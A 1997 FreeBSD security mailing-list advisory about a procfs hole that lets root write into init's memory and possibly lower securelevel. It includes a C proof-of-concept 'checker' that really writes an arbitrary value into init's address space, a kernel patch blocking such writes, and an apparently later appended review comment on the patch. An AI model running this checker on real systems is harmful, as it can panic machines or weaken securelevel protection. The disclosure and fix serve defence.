From owner-freebsd-security Fri Sep 5 23:55:17 1997
Date: Sat, 6 Sep 1997 02:53:25 -0400 (EDT)
From: Brian Mitchell
To: freebsd-security@freebsd.org
cc: bugtraq@netspace.org
Subject: procfs take II

There is a slight procfs hole that could allow an intruder to lower the securelevel. init's memory is not protected, so you can overwrite data/instructions in init and possibly lower the securelevel (although panicking the system is much more likely).
Enclosed is a vulnerability checker:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>

int main(void)
{
    int tqbf = 31337;   /* arbitrary value to write into init's address space */
    int fd;
    int g0nz0;          /* result of write(): >= 0 means the write went through */

    if (getuid()) {
        fprintf(stderr, "this attack needs root\n");
        exit(1);
    }
    /* open init's mem node read/write; procfs should refuse this when securelevel > 0 */
    fd = open("/proc/1/mem", O_RDWR);
    if (fd < 0) {
        fprintf(stderr, "open of /proc/1/mem failed\n");
        exit(2);
    }
    lseek(fd, 0x1000, SEEK_SET);
    g0nz0 = write(fd, &tqbf, sizeof(int));
    close(fd);
    if (g0nz0 >= 0)
        fprintf(stderr, "procfs is vulnerable!\n");
    else
        fprintf(stderr, "procfs is not vulnerable!\n");
    printf("returned %d\n", g0nz0);
    return 0;
}

Here is a simple patch; it disallows writes to pid 1's mem node if securelevel is > 0 (the diff is based on a 2.2.1 box with the securelevel fix applied):

*** procfs_mem.c Sat Sep 6 02:36:39 1997 --- procfs_mem.c.new Sat Sep 6 02:38:25 1997 *************** *** 316,321 **** --- 316,325 ---- !(curp->p_cred->pc_ucred->cr_gid == KMEM_GROUP && uio->uio_rw == UIO_READ)) return EPERM; + + /* writing to init memory while securelevel > 0 is bad */ + if(uio->uio_rw == UIO_WRITE && p->p_pid == 1 && securelevel > 0) + return EPERM; error = procfs_rwmem(p, uio);

Brian Mitchell brian@firehouse.net
"BSD code sucks. Of course, everything else sucks far more." - Theo de Raadt (OpenBSD President)
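Review bot: the added guard `if(uio->uio_rw == UIO_WRITE && p->p_pid == 1 && securelevel > 0) return EPERM;` sits after the existing KMEM_GROUP credential check, so it only fires for callers that already passed that check, which is the intent; but the comment `/* writing to init memory while securelevel > 0 is bad */` should say why (a write into init's address space can be used to lower securelevel, which is exactly what securelevel is meant to prevent) so the rationale survives in the source. Reads of pid 1's mem node remain permitted at any securelevel and the check keys purely on `p->p_pid == 1`; both are reasonable, but state them explicitly in the commit message as deliberate.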